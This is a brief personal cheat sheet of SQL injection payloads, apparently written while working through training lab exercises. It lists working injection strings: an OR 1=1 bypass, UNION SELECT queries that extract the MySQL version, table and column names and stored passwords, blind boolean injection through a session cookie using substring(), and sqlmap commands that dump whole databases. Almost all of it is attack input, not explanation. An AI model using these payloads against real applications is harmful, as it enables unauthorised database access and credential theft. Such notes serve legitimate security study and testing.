SQLi
# VIEW THIS
https://portswigger.net/web-security/sql-injection/cheat-sheet
# Second order
# Just see the injection0x04
jeremy' or 1=1-- -
# The pound sign (#) is a MySQL comment terminator, equivalent to -- -
jeremy' union select null,null,version()#
jeremy' union select null,null,version()-- -
jeremy' union select null,null,table_name from information_schema.tables#
jeremy' union select null,null,column_name from information_schema.columns#
jeremy' union select null,null,password from injection0x01#
# First you need a valid session
# Try injecting into the session cookie header
# See the injection 02 section
# This is a blind injection: nothing is returned directly, only a change in behaviour
Cookie: session=6967cabefd763ac1a1a88e11159957db' or 1=1#
# https://www.w3schools.com/sql/func_mysql_substring.asp
# First, determine the SQL server version
# The second argument is the start position; 1 means the first character, i.e. the "MY" of "MY SQL HAHA"
# The third argument is the length, i.e. how many characters to take (e.g. 5 for "abcde")
Cookie: session=6967cabefd763ac1a1a88e11159957db' and substring((select version()),1,1) = '8'#
Cookie: session=6967cabefd763ac1a1a88e11159957db' and substring((select version()),1,3) = '8.0'#
Cookie: session=6967cabefd763ac1a1a88e11159957db' and substring((select version()),1,5) = '8.0.3'#
# First save the request with the session cookie
# See the injection 0x02
# --level=2 makes sqlmap also test the Cookie header
sqlmap -r session.txt --level=2
# This will dump every database
sqlmap -r session.txt --level=2 --dump
# This will dump only the injection0x02 table
sqlmap -r session.txt --level=2 --dump -T injection0x02